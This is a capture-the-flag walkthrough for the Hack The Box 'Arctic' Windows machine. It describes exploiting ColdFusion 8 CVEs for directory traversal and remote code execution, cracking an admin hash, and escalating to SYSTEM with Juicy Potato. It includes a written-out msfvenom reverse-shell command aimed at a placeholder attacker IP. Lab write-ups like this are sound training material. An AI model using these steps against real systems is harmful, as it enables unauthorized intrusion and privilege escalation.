Skip to content

Hack The Box - Arctic Walkthrough

Overview

Item Details
Platform Hack The Box
Machine Arctic
Difficulty Easy
OS Windows
Release Date 22 March 2017
Created By ch4p
Pwn Date 03 December 2025

HTB Machine

You can solve Arctic through different ways. Here I have mentioned two methods for initial access. You can get initial foothold and user flag through CVEs of ColdFusion. Privilege escalation can be done with the Potato attack🥔.


Enumeration

We can start with finding open ports and services on the target.
Nmap Scan

Lets explore the page available in port 8500.
Web Directory

You'll be able to access a administrator login page. Also check the version of the Adobe ColdFusion used.
ColdFusion Login Page

Initial Foothold 1

If you got the version of the services used in the target system, the first thing you should do is check online for any released CVEs and exploits.
For ColdFusion 8 there is a directory traversal vulnerability → CVE-2010-2861

Directory Traversal CVE

Here using the traversal vulnerability we got a hashed password. You can crack this hash easily by using online tool - CrackStation

Password Hash
Hash Cracked

The credential we found: admin : happyday

We can login to the page using the credential. If you check the "Mappings" section you can see the directory paths.

Directory Mappings

Lets try to get a reverse shell by exploiting the web functionalities. For that go to "Debugging & Logging → Scheduled Tasks". In here we can create task to fetch a reverse shell file.

Task Scheduling

Task for fetching the file

Now create a reverse shell using msfvenom and start a python server for hosting the payload.
Payload generation

Now in the Scheduled Tasks section you can see our task. Click the button to Run Scheduled Task.
Task Created

Task Executed

Now our payload got stored in the target machine. Go to the path we found earlier and locate our payload. Also start a netcat listner on your machine before executing the payload.

Payload Saved Location

Netcat Listener Started

Now if you trigger the payload we'll get a reverse shell in our netcat listener as tolis.
Got a reverse shell

Initial Foothold 2

Lets try another method to get access to the target machine.

If you search for available CVEs for ColdFusion 8, you can find a CVE which will allow us to get RCE.

Reference:
CVE-2009-2265

RCE Exploit

Now download the python payload and configure it accordingly.
Editing the payload

If you execute the payload after configuring it based on your environment, you'll directly get a shell as tolis.

Exploit Initiated

Got a reverse shell

Now lets capture the user flag.
User Flag Captured!

Privilege Escalation

Lets check what and all privileges this user have.

whoami /priv
Got a reverse shell

As you can see the "SeImpersonatePrivilege" is enabled. Now you would have got the idea of what attack we should be trying here - Potato Attack.

Reference:
https://jlajara.gitlab.io/Potatoes_Windows_Privesc

The one we are gonna use here is Juicy Potato exploit.

Exploit:
https://github.com/ohpe/juicy-potato/releases

Now create a reverse shell .exe payload and get juicypotato and reverse shell payload into target machine.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attacker-ip> LPORT=<attacker-port> -f exe -o shell.exe
Reverse Shell Payload

Downloading payloads into target machine

Now we have all we need. Start a netcat listener on the specified port and execute the JuicyPotato.
Netcat Listener Started

JuicyPotato Executed

As you can see in the listener we successfully got a shell as system.
Got Administrator Shell

Now you lets capture the root flag from Administrator's Deskotp.
Root Flag Captured!

We have successfully pwned the Arctic❄️.

Achievement:
https://labs.hackthebox.com/achievement/machine/1745666/9

Machine Completed

Thank you all...✨